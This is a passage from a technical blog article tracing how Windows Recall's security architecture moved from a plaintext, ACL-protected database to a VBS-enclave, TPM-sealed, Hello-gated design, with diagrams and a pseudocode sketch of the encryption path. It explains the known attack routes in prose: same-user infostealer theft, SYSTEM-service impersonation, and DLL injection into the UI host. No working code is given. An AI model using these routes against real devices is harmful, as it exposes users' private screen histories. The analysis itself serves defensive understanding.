&lt;p&gt;Before naming them, it is worth crediting what the original design got &lt;em&gt;right&lt;/em&gt;, because that commitment survived the re-architecture intact. The data flow was on-device only. Snapshots, OCR&apos;d text, and the local semantic index never traversed the Microsoft Diagnostic Data telemetry pipeline; nothing left the device by design [@rec-01]. That property is preserved in the Generation 3 architecture [@rec-03] and is reiterated in the IT administrator documentation [@rec-08]. The original engineering team did not get the privacy framing wrong as a category. They got the &lt;em&gt;isolation&lt;/em&gt; framing wrong.&lt;/p&gt;

BitLocker is the Windows full-volume encryption feature. Its threat model is offline disk theft: an adversary who removes a powered-off laptop&apos;s storage and tries to read its contents on another machine encounters AES-XTS-encrypted blocks instead of plaintext files. BitLocker is transparent when the device is powered on and the user is logged in; it does not authenticate any individual file access against the running operating system. Beaumont&apos;s structural point in §2 was that BitLocker&apos;s threat model and Recall&apos;s threat model do not overlap: Recall&apos;s adversary is a process running in the live, logged-on session.

The Data Protection API is the Windows user-mode interface for protecting per-user secrets with a key derived from the user&apos;s logon credentials. Browsers historically used DPAPI to protect saved-credential databases; the well-known weakness is that any process running as the user can call `CryptUnprotectData` against the same files and get plaintext back. DPAPI did *not* appear in the original Recall design -- the pre-audit framing that imagined Recall as &quot;DPAPI used incorrectly&quot; was a misreading. The actual original Recall stored a plaintext SQLite file under filesystem ACLs alone, as Hagenah&apos;s tool demonstrated [@rec-20] [@rec-19]. The September 2024 re-architecture also does not use DPAPI; it uses TPM-sealed master keys released to a VBS Enclave on Hello ESS authentication [@rec-03].
&lt;h3&gt;Assumption 1: The SYSTEM-only filesystem ACL is a same-user isolation boundary&lt;/h3&gt;
&lt;p&gt;The directory &lt;code&gt;C:\Users\&amp;lt;user&amp;gt;\AppData\Local\CoreAIPlatform.00\UKP\&lt;/code&gt; was protected by an ACL that permitted SYSTEM to read and write, and denied the logged-on user direct access. The original design treated this as an isolation boundary between user-context code and the Recall database. Forshaw&apos;s June 3 post refuted this directly [@rec-14]: a same-user process can obtain SYSTEM-context file access by impersonating a SYSTEM-context service that handles user-supplied input. The technique is generic, well documented in the Tyranid&apos;s Lair archive, and predates Recall by years. Once Forshaw published the worked example, the original ACL stopped looking like a boundary and started looking like a speed bump.&lt;/p&gt;
&lt;h3&gt;Assumption 2: BitLocker-at-rest is sufficient because the live system is trusted for the logged-on user&lt;/h3&gt;
&lt;p&gt;The original team assumed that an attacker against Recall data would necessarily be either (a) an offline adversary with physical possession of the powered-off disk -- defeated by BitLocker -- or (b) an attacker with administrator access -- out of scope per the MSRC servicing criteria [@rec-11]. Beaumont demolished this by pointing at a third class: an in-session, user-context InfoStealer that is already common, already on the InfoStealer-as-a-service price list, and trivially extensible to dump a new SQLite file [@rec-15] [@rec-19]. BitLocker&apos;s threat model and Recall&apos;s threat model did not overlap; assuming they did was the mistake.&lt;/p&gt;
&lt;h3&gt;Assumption 3: Defender&apos;s automated remediation will outrun InfoStealer exfiltration&lt;/h3&gt;
&lt;p&gt;Even granting the existence of in-session adversaries, the original assumption was that Defender for Endpoint&apos;s behavioural detection would catch them before they finished. Beaumont&apos;s measurement said otherwise: the InfoStealer was detected, but automated remediation took roughly ten minutes to land, by which point the exfiltration of a Recall snapshot directory had finished in two seconds [@rec-19] [@rec-15]. The asymmetry was not a Defender bug; it was a category problem. Defender&apos;s response is calibrated for the historical InfoStealer corpus (browser cookies, credential databases); a new bulk corpus introduces a race the existing rules were not tuned for.&lt;/p&gt;
&lt;h3&gt;Assumption 4: Same-user, administrator-level access is not a security boundary anyway&lt;/h3&gt;
&lt;p&gt;This last assumption is technically correct, per the MSRC servicing criteria [@rec-11]. UAC, admin-to-kernel, and same-user post-authentication are documented non-boundaries. The argument goes: if a feature is &quot;in the user&apos;s trust boundary&quot; -- any code running as the user can access it -- then any attacker who is already running as the user has by definition already won. The feature has nothing further to defend.&lt;/p&gt;
&lt;p&gt;The trouble is that the demonstrated Recall attacks did &lt;em&gt;not&lt;/em&gt; require admin. Beaumont&apos;s testing and Forshaw&apos;s ACL impersonation both operated from standard-user context [@rec-15] [@rec-14]. &quot;Same-user attacks are out of scope&quot; is a different statement from &quot;attacks that succeed without elevation are out of scope,&quot; and the original Recall design conflated the two.The Malwarebytes coverage of Hagenah&apos;s tool described the attack as requiring &quot;administrator rights&quot; [@rec-20]. This was an overstatement -- Beaumont and Forshaw both established that admin was not required. Subsequent coverage in Help Net Security used the stricter framing [@rec-19].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Same-user code is in the user&apos;s trust boundary unless the architecture explicitly authenticates per-access. A SYSTEM-only filesystem ACL is not authentication; it is access control under an assumption (no impersonation) that the Windows DACL model does not enforce in the user&apos;s favour. BitLocker is not authentication either; it is data-at-rest encryption with a key already released by the time the user is logged on. The original Recall design relied on both of these to act like per-access authentication, and neither one was built to do that.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If &quot;same-user code is in the user&apos;s trust boundary&quot; was the bug, what does an architecture look like that authenticates per-access?&lt;/p&gt;
&lt;h2&gt;4. From the June 7 Commitment to the September 27 Architecture&lt;/h2&gt;
&lt;p&gt;The June 7 retreat named three properties: opt-in, Hello-gated, just-in-time decrypted. The architecture that enforces those properties did not exist on June 7. It existed by September 27, was previewable on November 22, and shipped across Snapdragon, Intel, and AMD between April 25 and May 13, 2025. Here is the path between the commitment and the architecture.&lt;/p&gt;
&lt;h3&gt;Generation 0: The substrate that already existed&lt;/h3&gt;
&lt;p&gt;Before Recall, the VBS Enclave primitive was already running in production -- but in a corner of the Windows-server stack that desktop engineers rarely visited. SQL Server 2019 introduced &lt;em&gt;Always Encrypted with secure enclaves&lt;/em&gt; on November 4, 2019, almost five years before the Recall preview [@rec-10]. The feature lets a database hold client-encrypted columns and still answer equality and range queries inside an enclave that is part of the &lt;code&gt;sqlservr.exe&lt;/code&gt; process but isolated from the rest of it. The Microsoft Learn page for VBS Enclaves cross-links Always Encrypted as a sibling consumer of the primitive [@rec-06].&lt;/p&gt;
&lt;p&gt;This matters for two reasons. First, the September 27 architecture did not require Microsoft to invent VBS Enclaves -- the primitive shipped in 2019 and had been stable in production for half a decade by the time Recall reached for it. Second, the original input to this article incorrectly imagined Recall as &quot;the first VBS-enclave product outside the credential set&quot;; the correct claim is narrower. Recall is the first VBS-enclave deployment &lt;em&gt;in the Windows desktop shell&lt;/em&gt; to receive sustained adversarial review. SQL Server 2019 is the substrate precedent; Recall is the desktop-shell debut.&lt;/p&gt;

Microsoft Pluton is a security processor design that integrates root-of-trust functionality, including TPM 2.0 services, directly into the main system-on-chip rather than on a separate discrete chip on the motherboard. The integration matters because the LPC or SPI bus between a discrete TPM and the CPU is the attack surface used by bus-sniffing attacks; on a Pluton-equipped device that bus does not exist for the security-processor traffic. Microsoft publishes the chipset availability list: AMD Ryzen 6000, 7000, 8000, 9000 and Ryzen AI; Intel Core Ultra 200V, Series 3, Series 3 processors; Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series [@rec-24]. Pluton firmware updates ship through Windows Update.

A TPM is a tamper-resistant cryptographic processor that holds keys which can be released to the operating system only when a set of preconditions (the values of platform configuration registers, the presence of an authenticated user, the result of an attestation) is met. TPM 2.0 is the version family in current shipment. Recall uses the TPM for *sealing* -- binding the Recall master key to the boot state of the machine and to the identity of the user, so the key cannot be released to a different OS instance or a different user even with full disk access.
&lt;h3&gt;Generation 1: The May 20, 2024 design&lt;/h3&gt;
&lt;p&gt;Already covered in §3. Four assumptions, all wrong; one runnable counter-example (Hagenah&apos;s &lt;em&gt;TotalRecall&lt;/em&gt;); zero mechanism to make the assumptions right.&lt;/p&gt;
&lt;h3&gt;Generation 2: The June 7 commitment&lt;/h3&gt;
&lt;p&gt;The Davuluri blog of June 7 [@rec-02] was not an architecture; it was a set of properties the next architecture would have to enforce. &lt;em&gt;Opt-in&lt;/em&gt; is a UX commitment; &lt;em&gt;Hello-gated&lt;/em&gt; is a credential commitment; &lt;em&gt;just-in-time decryption&lt;/em&gt; is a key-management commitment. Each one rules out a class of approach -- opt-in rules out silent default-on; Hello-gated rules out a key that can be read without biometric attestation; just-in-time rules out a long-lived plaintext cache. None of them, taken alone, prescribes a specific design.&lt;/p&gt;
&lt;h3&gt;Generation 3: The September 27, 2024 architecture&lt;/h3&gt;
&lt;p&gt;This is the load-bearing announcement. Davuluri&apos;s blog [@rec-03] and David Weston&apos;s companion SecurityWeek interview [@rec-17] together describe four security and privacy design principles and five architectural components.&lt;/p&gt;
&lt;p&gt;The four principles, drawn from Davuluri&apos;s blog [@rec-03]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;The user is always in control.&lt;/em&gt; Recall is opt-in at setup, with Hello enrolment required before any snapshot capture.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Sensitive data in Recall is always encrypted, and keys are protected.&lt;/em&gt; The blog specifies that encryption keys are bound to the TPM, tied to the user&apos;s Hello Enhanced Sign-in Security identity, and can only be used by operations inside a VBS Enclave.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Recall services that operate on snapshots and associated data are isolated.&lt;/em&gt; Snapshot processing, OCR, semantic embedding, and the sensitive-content filter all run inside the enclave; the on-disk database holds only ciphertext.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Users are present and intentional about the use of Recall.&lt;/em&gt; Hello ESS with anti-hammering and rate-limiting governs each authorisation; PIN fallback is permitted only after Hello has been set up.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The five components: &lt;em&gt;Secure Settings&lt;/em&gt;, &lt;em&gt;Semantic Index&lt;/em&gt;, &lt;em&gt;Snapshot Store&lt;/em&gt;, &lt;em&gt;Recall UI&lt;/em&gt;, and &lt;em&gt;Snapshot Service&lt;/em&gt; [@rec-03]. Davuluri&apos;s architecture diagram labels four of them as inside the trust boundary and one of them -- &lt;em&gt;Recall UI&lt;/em&gt; -- as explicitly outside it. The line is verbatim: &quot;Recall components such as the Recall UI operate outside the VBS Enclaves and are untrusted in this architecture.&quot; That line is the seam §8 will return to.&lt;/p&gt;

It&apos;s now fully encrypted, and tied to the user&apos;s physical presence. -- David Weston, CVP Enterprise and OS Security, in conversation with Ryan Naraine [@rec-17]
&lt;p&gt;The composition is not novel cryptography. The novelty is the &lt;em&gt;layering&lt;/em&gt;: VBS Enclaves (Generation 0 substrate), &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM-2.0 key sealing&lt;/a&gt; (a primitive Windows has shipped since 2012), Hello ESS (an attestation primitive cataloged on Microsoft Learn since the Windows 11 launch [@rec-25]), and Microsoft Purview Exact Data Match filtering (a content-classification primitive previously seen in the Microsoft Purview enterprise product) compose into a single user-facing feature. Each layer was already production-stable; the September 27 design wires them together.&lt;/p&gt;
&lt;h3&gt;First observable build and broad rollout&lt;/h3&gt;
&lt;p&gt;The first observable build of Generation 3 was Insider Dev Channel Build 26120.2415 on Snapdragon Copilot+ PCs, KB5046723, released November 22, 2024 [@rec-04] [@rec-18]. The first-run experience in that build asks the user to opt in to saving snapshots and to enrol Windows Hello [@rec-04]. Build 26120.2510 (December 6, 2024) extended Insider preview to AMD and Intel Copilot+ PCs. GA across all three silicon vendors landed in the April 25, 2025 Windows Experience Blog announcement [@rec-05], with broad rollout in the May 13, 2025 Patch Tuesday cycle [@rec-21]. The IT-admin manageability surface -- &lt;code&gt;AllowRecallEnablement&lt;/code&gt;, &lt;code&gt;DisableAIDataAnalysis&lt;/code&gt;, snapshot-retention policy, disk-allocation policy, per-app exclusion list -- is documented in &lt;em&gt;Manage Recall&lt;/em&gt; on Microsoft Learn [@rec-08].&lt;/p&gt;

flowchart TD
    G0[&quot;Gen 0 (Nov 4, 2019)&lt;br /&gt;SQL Server 2019&lt;br /&gt;Always Encrypted with secure enclaves&lt;br /&gt;(VBS Enclave substrate precedent)&quot;]
    G1[&quot;Gen 1 (May 20, 2024)&lt;br /&gt;Plaintext SQLite&lt;br /&gt;SYSTEM-only filesystem ACL&lt;br /&gt;(Did not ship)&quot;]
    G2[&quot;Gen 2 (June 7, 2024)&lt;br /&gt;Opt-in commitment&lt;br /&gt;Hello-gated commitment&lt;br /&gt;Just-in-time decryption&lt;br /&gt;(Commitment, no architecture)&quot;]
    G3[&quot;Gen 3 (Sept 27, 2024)&lt;br /&gt;VBS Enclave + TPM-sealed&lt;br /&gt;Hello ESS + Purview EDM&lt;br /&gt;(Architecture)&quot;]
    G4[&quot;Gen 4 (Apr 25 - May 13, 2025)&lt;br /&gt;GA on Snapdragon, Intel, AMD&lt;br /&gt;Intune surface matured&quot;]
    G5[&quot;Gen 5 (April 2026)&lt;br /&gt;TotalRecall Reloaded&lt;br /&gt;AIXHost.exe DLL injection&lt;br /&gt;(UI seam disclosed)&quot;]
    G0 --&amp;gt; G1
    G1 -- &quot;Plaintext SQLite + filesystem ACL broken in 4 weeks&quot; --&amp;gt; G2
    G2 -- &quot;Commitment needs a mechanism&quot; --&amp;gt; G3
    G3 -- &quot;Cryptographic chain holds; shipped to GA&quot; --&amp;gt; G4
    G4 -- &quot;UI host outside enclave by design&quot; --&amp;gt; G5
&lt;p&gt;The structural takeaway is this. Composing three primitives Microsoft had already shipped -- VBS Enclaves, TPM 2.0 sealing, and Hello ESS -- plus a fourth (Purview EDM filtering) yielded the September 27 architecture that enforces the three June 7 properties. None of the four primitives is new in 2024; the &lt;em&gt;application&lt;/em&gt; of all four to a personal-context store running in the desktop shell is.&lt;/p&gt;
&lt;p&gt;If &quot;VBS Enclave + TPM-sealed key + Hello ESS&quot; is the answer, what does the inside of the enclave actually do?&lt;/p&gt;
&lt;h2&gt;5. Inside the Enclave: VBS as the Load-Bearing Primitive&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s own September 27 architecture diagram draws five boxes. One of them is labelled &lt;em&gt;untrusted&lt;/em&gt;. Here is what the other four do, and why the untrusted one matters.&lt;/p&gt;

A Virtualization-based Security (VBS) Enclave is, in Microsoft&apos;s own words on the Learn page that defines the primitive, &quot;a software-based trusted execution environment inside the address space of a host application&quot; [@rec-06]. Concretely, it is a sub-region of a normal user-mode (VTL0) process that is promoted to VTL1 by the Secure Kernel. Code inside the enclave can see its own memory and the bytes the host explicitly passes in across the enclave boundary; the host process cannot see plaintext inside the enclave, and neither can the rest of the operating system, including the kernel and any administrator. The primitive requires VBS and HVCI to be enabled, and Windows 11 Build 26100.2314 or later [@rec-06].

The Windows hypervisor partition that hosts VBS divides each running guest into two virtual trust levels: VTL0 (normal user mode and kernel) and VTL1 (Isolated User Mode and the Secure Kernel). The Secure Kernel is a minimal, signed component that runs in VTL1; it is what enforces the isolation guarantee between VTL0 and VTL1. Code in VTL0 cannot read VTL1 memory; the hypervisor enforces this at the second-level page table. The VBS Enclave primitive uses VTL1 as the substrate for the enclave sub-region.

Enhanced Sign-in Security, per the canonical Microsoft Learn definition, &quot;provides an additional level of security to biometric data with the use of specialized hardware and software components. Virtualization Based Security (VBS) and Trusted Platform Module 2.0 are used to isolate and protect user&apos;s authentication data, and to secure the data communication channel&quot; [@rec-25]. The face-matching algorithm runs in VBS; the sensor-to-algorithm path is an isolated, certificate-authenticated channel. ESS-capable IR cameras and presence sensors are a hardware prerequisite; absent ESS hardware, Recall degrades to a PIN/password fallback.
&lt;h3&gt;The five components&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Snapshot Service&lt;/strong&gt; is a &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light (PPL)&lt;/a&gt; that captures the screen at approximately 5-second intervals and feeds the raw frames into the enclave. PPL means the Snapshot Service is signed at a level the rest of user mode cannot inject into. Plaintext frames and per-snapshot keys do not live in the Snapshot Service&apos;s address space; they cross into the enclave immediately on capture.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;VBS Enclave&lt;/strong&gt; is the trust boundary. Inside it: OCR over the raw frame; semantic vector embedding for search; sensitive-content filtering via the Microsoft Purview Exact Data Match libraries; per-snapshot key derivation from a TPM-sealed master; AES-256-GCM authenticated encryption of the snapshot and the embedding. Plaintext OCR output never crosses the enclave boundary.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Snapshot Store&lt;/strong&gt; is the on-disk database of AES-256-GCM-encrypted per-snapshot blobs and encrypted embeddings. No process -- not even the Snapshot Service that wrote the file, not the kernel, not an administrator -- can decrypt the blobs without going back through the enclave with a Hello-authenticated session grant [@rec-03].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Semantic Index&lt;/strong&gt; is the query path over the encrypted embeddings. A user query traverses the enclave so that the plaintext embedding (and the plaintext OCR text it points at) never leaves the trust boundary.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Recall User Experience (UI)&lt;/strong&gt; runs &lt;em&gt;outside&lt;/em&gt; the enclave. Microsoft&apos;s architecture diagram labels it untrusted. The UI receives only data the enclave has authorised for the current session, after Hello ESS, with a timeout, with anti-hammering and rate-limiting on the authorisation window [@rec-03].&lt;/li&gt;
&lt;/ol&gt;

AES-256-GCM is the Galois/Counter Mode of operation for AES with a 256-bit key, specified by NIST SP 800-38D [@rec-26]. It is an authenticated encryption with associated data (AEAD) primitive: each ciphertext carries an authentication tag computed over the ciphertext and the associated data, and decryption fails if the tag does not verify. Recall uses AES-256-GCM per snapshot, with a per-snapshot key derived inside the enclave. The published architecture identifies AES-256-GCM as the primitive but does not document the key derivation function or the per-snapshot nonce scheme.

Purview EDM is a content-classification primitive from the Microsoft Purview enterprise data-loss-prevention product family. It matches text against high-precision patterns: structured credentials, national-identifier formats (US Social Security Numbers, EU identifier formats), payment card numbers under Luhn checksum. In Recall, the EDM library runs inside the enclave on the OCR output, *before* the per-snapshot encryption step. Matches are excluded from the persistent record; the screenshot of a credit-card form has the card number stripped from the OCR text and (per Weston&apos;s framing in SecurityWeek) is treated as a sensitive class that does not enter the snapshot store [@rec-17].

flowchart TD
    SS[&quot;Snapshot Service&lt;br /&gt;PPL, VTL0&lt;br /&gt;captures every ~5s&quot;]
    ENC[&quot;VBS Enclave (VTL1 sub-region)&lt;br /&gt;OCR + embedding&lt;br /&gt;Purview EDM filter&lt;br /&gt;per-snapshot key derivation&lt;br /&gt;AES-256-GCM encrypt&quot;]
    STORE[&quot;Snapshot Store&lt;br /&gt;on-disk&lt;br /&gt;AES-256-GCM ciphertext only&quot;]
    IDX[&quot;Semantic Index&lt;br /&gt;encrypted embeddings&quot;]
    UI[&quot;Recall UI&lt;br /&gt;(VTL0, UNTRUSTED in architecture)&quot;]
    HELLO[&quot;Hello ESS&lt;br /&gt;per-access biometric&quot;]
    TPM[&quot;TPM 2.0&lt;br /&gt;sealed master key&quot;]
    SS --&amp;gt; ENC
    TPM --&amp;gt; ENC
    HELLO --&amp;gt; ENC
    ENC --&amp;gt; STORE
    ENC --&amp;gt; IDX
    STORE --&amp;gt; ENC
    IDX --&amp;gt; ENC
    ENC -- &quot;post-auth release&quot; --&amp;gt; UI
&lt;h3&gt;The per-snapshot key chain&lt;/h3&gt;
&lt;p&gt;Davuluri&apos;s blog specifies the chain but does not publish either the key derivation function used to expand the TPM-sealed master into a per-snapshot key, or the per-snapshot nonce scheme fed into AES-256-GCM. The pseudocode below reconstructs the structure from the published primitives. &lt;em&gt;Microsoft has not published the literal KDF or nonce scheme&lt;/em&gt;; this is the shape of the computation, not the verbatim source.&lt;/p&gt;
&lt;p&gt;{`&lt;/p&gt;
Reconstructed sketch of the enclave-side write path.
Microsoft has published the primitives (TPM 2.0 sealing, Hello ESS gating,
VBS Enclave isolation, AES-256-GCM per snapshot, Purview EDM filtering)
but has NOT published the literal KDF or nonce scheme.
This is a structural reconstruction for teaching purposes.
&lt;p&gt;def enclave_write_snapshot(raw_frame, snapshot_id):
    # Step 1: in-enclave OCR over the raw screen capture.
    ocr_text = enclave_ocr(raw_frame)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Step 2: Purview EDM filter strips known-sensitive patterns
# (credentials, national IDs, PAN) BEFORE persistence.
filtered_text = purview_edm_filter(ocr_text)

# Step 3: semantic embedding for the search index.
embedding = enclave_embed(filtered_text)

# Step 4: derive a per-snapshot key from the TPM-sealed master.
# The master was released into the enclave on Hello ESS authentication.
snapshot_key = kdf(master_key_in_enclave,
                   context=b&quot;recall-snapshot&quot;,
                   salt=snapshot_id)

# Step 5: AES-256-GCM authenticated encryption with a fresh nonce.
nonce = derive_nonce(snapshot_id)
aad   = serialize_metadata(snapshot_id, timestamp=now())
ciphertext, tag = aes_256_gcm_encrypt(
    snapshot_key,
    nonce,
    plaintext=concat(raw_frame, filtered_text, embedding),
    aad=aad,
)

# Step 6: persistent write. Nothing plaintext crosses the enclave boundary.
snapshot_store.put(snapshot_id, ciphertext, tag, nonce, aad)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;`}&lt;/p&gt;
&lt;p&gt;The Hello ESS layer plugs in at step 4: the TPM-sealed master is released into the enclave only on a fresh, ESS-attested authentication, and the release path uses the certificate-authenticated sensor-to-VBS channel described on the Hello ESS Learn page [@rec-25]. Failed authentication trips the standard TPM anti-hammer lockout. PIN fallback is permitted only after Hello has been set up.&lt;/p&gt;

sequenceDiagram
    participant User
    participant Sensor as Hello ESS sensor
    participant SK as Secure Kernel (VTL1)
    participant TPM as TPM 2.0
    participant Encl as Recall VBS Enclave (VTL1)
    participant Store as Snapshot Store
    User-&amp;gt;&amp;gt;Sensor: present face / fingerprint
    Sensor-&amp;gt;&amp;gt;SK: ESS-authenticated biometric attestation
    SK-&amp;gt;&amp;gt;TPM: request key release on attested context
    TPM-&amp;gt;&amp;gt;SK: sealed master key (released to VTL1 only)
    SK-&amp;gt;&amp;gt;Encl: hand master key into enclave
    Encl-&amp;gt;&amp;gt;Encl: derive per-snapshot key, AES-256-GCM encrypt
    Encl-&amp;gt;&amp;gt;Store: ciphertext + AEAD tag + nonce

Microsoft&apos;s documentation distinguishes two patterns that share the same VTL1 substrate. A *VBS Enclave* is a sub-region of a VTL0 host process that is promoted to VTL1 by the Secure Kernel [@rec-06]. An *[IUM Trustlet](/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/)* (like LsaIso, the Credential Guard worker) is a full Isolated User Mode process that runs wholly in VTL1. Both rely on the same hypervisor partition and the same Secure Kernel. The terminology matters because the September 27 architecture blog [@rec-03] and the developer-facing Tech Community explainer [@rec-07] both use *VBS Enclave* throughout for Recall, distinct from LsaIso. The pre-audit framing that called Recall &quot;a new IUM trustlet&quot; was a category mistake; the architecture is a sub-region-of-host-process enclave, not a full trustlet process. Both patterns are governed by the MSRC security boundary policy [@rec-11], which lists VBS as a boundary against the kernel and against administrative users.

VBS Enclaves are not new -- SQL Server 2019 *Always Encrypted with secure enclaves* established the substrate roughly five years before Recall (see §4 Generation 0). What Recall contributes is not the substrate but the deployment context: a personal-context store on the desktop shell, with a UX that puts the trust boundary in front of consumers and an adversarial review history (Hagenah, Beaumont, Forshaw) that no SQL Server feature has attracted.

flowchart LR
    subgraph VBS_Encl[&quot;VBS Enclave pattern (Recall)&quot;]
        H[&quot;Host process&lt;br /&gt;(VTL0, e.g. Snapshot Service)&quot;] --- E[&quot;Enclave sub-region&lt;br /&gt;(VTL1)&quot;]
    end
    subgraph IUM[&quot;IUM Trustlet pattern (LsaIso / Credential Guard)&quot;]
        L[&quot;Trustlet process&lt;br /&gt;(entirely in VTL1)&quot;]
    end
    SK[&quot;Secure Kernel (VTL1)&quot;]
    HV[&quot;Hypervisor partition&quot;]
    VBS_Encl --&amp;gt; SK
    IUM --&amp;gt; SK
    SK --&amp;gt; HV
&lt;p&gt;Davuluri&apos;s September 27 blog adds two transparency commitments that bear on how much of this architecture an outside reviewer can verify. First, Microsoft&apos;s internal MORSE team (Microsoft Offensive Research and Security Engineering) ran a penetration test of the Generation 3 design before disclosure [@rec-03]. Second, an unnamed third-party security vendor performed an independent review. Neither report is public. §9 will return to this transparency gap.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The cryptographic boundary in Generation 3 is &lt;em&gt;above&lt;/em&gt; the filesystem. A process with full filesystem access reads only AES-256-GCM ciphertext. A kernel-mode caller reads only ciphertext. An administrator reads only ciphertext. The boundary is at the enclave, not at the file. This is qualitatively different from &quot;add encryption to the SQLite file&quot; and is the reason the Generation 3 design closes the four Generation 1 failures rather than merely patching them.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the cryptographic chain holds against the kernel and against administrators, where can it ship?&lt;/p&gt;
&lt;h2&gt;6. Where Recall Ships in May 2026&lt;/h2&gt;
&lt;p&gt;The post-September-2024 Recall is no longer a preview. Here is the silicon it runs on, the policies an IT admin sees, and the exclusion surfaces a user can configure.&lt;/p&gt;
&lt;h3&gt;Shipping silicon&lt;/h3&gt;
&lt;p&gt;The chipset matrix is documented on the Microsoft Pluton Learn page [@rec-24] and corroborated by the GA announcement [@rec-05]. The pattern is consistent: every Copilot+ PC carries TPM 2.0 services, but the &lt;em&gt;attachment&lt;/em&gt; of those services varies by silicon vendor.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Silicon family&lt;/th&gt;
&lt;th&gt;Security processor&lt;/th&gt;
&lt;th&gt;Typical TPM attachment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Qualcomm Snapdragon X Elite / X Plus&lt;/td&gt;
&lt;td&gt;Pluton (integrated)&lt;/td&gt;
&lt;td&gt;TPM 2.0 services delivered by Pluton on-die&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel Core Ultra 200V (Lunar Lake), Series 3, Series 3&lt;/td&gt;
&lt;td&gt;Pluton (integrated, where present) and discrete TPM 2.0&lt;/td&gt;
&lt;td&gt;Discrete TPM 2.0 plus Pluton-equivalent integration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMD Ryzen AI 300 series and Ryzen 6000-9000&lt;/td&gt;
&lt;td&gt;AMD Pluton Security Processor&lt;/td&gt;
&lt;td&gt;Pluton-equipped SKUs; some retain discrete TPM 2.0&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

PPL is the Windows process-protection level that gates which processes are permitted to inject code into, debug, or read the memory of a given target process. A PPL process is signed at a specific signer level; only processes signed at an equal-or-higher level can interact with its address space using the privileged debug or memory-access APIs. The Recall *Snapshot Service* is a PPL at a signer level the rest of user mode cannot reach. The *Recall UI* (covered in §8) is not a PPL, and that distinction is the architectural seam Hagenah&apos;s April 2026 disclosure exploits.
&lt;p&gt;The Pluton-versus-discrete-TPM trade-off is small but real. A Pluton-integrated TPM has no off-die bus carrying the security-processor traffic that an attacker can sniff with a logic analyser; the integration is in-package. A discrete TPM has a documented bus-sniffing attack surface that the Secured-core PC requirement set (HVCI, System Guard Secure Launch, Kernel DMA Protection) is designed to mitigate but does not eliminate.The bus-sniffing attack is not specific to Recall; it is a general TPM-attachment concern that applies to BitLocker, Credential Guard, and any other TPM-sealed key. Recall inherits both the threat and the mitigation set from the platform.&lt;/p&gt;
&lt;p&gt;For most Copilot+ PCs in 2026, the practical difference is small. The architectural correctness of the September 27 design does not depend on the choice.&lt;/p&gt;
&lt;h3&gt;The management surface&lt;/h3&gt;
&lt;p&gt;The IT-admin management surface is documented in &lt;em&gt;Manage Recall&lt;/em&gt; on Microsoft Learn [@rec-08]. The defaults differ between consumer and managed devices: on a managed device, &quot;Recall is disabled and removed&quot; by default, and an explicit Intune policy is required to allow enrolment. The relevant Intune Settings Catalog entries are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;AllowRecallEnablement&lt;/code&gt; -- the explicit consent gate for any organisation that wants Recall to be available on its managed fleet. &lt;em&gt;Threat model addressed:&lt;/em&gt; unintended consumer-default opt-in on managed devices; without this policy explicitly set to &quot;allowed,&quot; the &lt;em&gt;Manage Recall&lt;/em&gt; page&apos;s managed-device default (&quot;disabled and removed&quot;) stands.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DisableAIDataAnalysis&lt;/code&gt; -- the Group Policy gating surface for Copilot+ AI features. &lt;em&gt;Threat model addressed:&lt;/em&gt; organisations that want a single switch to keep all on-device AI processing (Recall, Click to Do, future shell features) off the fleet, rather than enumerating each feature individually.&lt;/li&gt;
&lt;li&gt;Snapshot-retention and storage-allocation policies -- data-minimisation controls for the per-device snapshot corpus. &lt;em&gt;Threat model addressed:&lt;/em&gt; bounding the maximum size of any single exfiltration window in the event a future UI-host weakness is found; fewer snapshots and shorter retention reduce the corpus exposed to a successful post-authentication extraction.&lt;/li&gt;
&lt;li&gt;Per-app exclusion list -- per-window snapshot exclusion for applications the operator designates. &lt;em&gt;Threat model addressed:&lt;/em&gt; high-value secrets surfaced by the password manager, the corporate VPN client, and similar sensitive UIs that should never enter the snapshot corpus regardless of how strong the storage encryption is.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Microsoft Purview Endpoint DLP adds a parallel policy surface for window-level snapshot exclusion of any application handling regulated data [@rec-08]. Group Policy parity exists for the same surfaces, for organisations that have not yet adopted Intune.Intune management of Recall was not a 2026 debut. The &lt;em&gt;Manage Recall&lt;/em&gt; documentation was published alongside the Insider preview in late 2024 and matured through the April-May 2025 GA cycle. The 2026 work is stabilisation, not introduction.&lt;/p&gt;
&lt;h3&gt;User-facing surfaces&lt;/h3&gt;
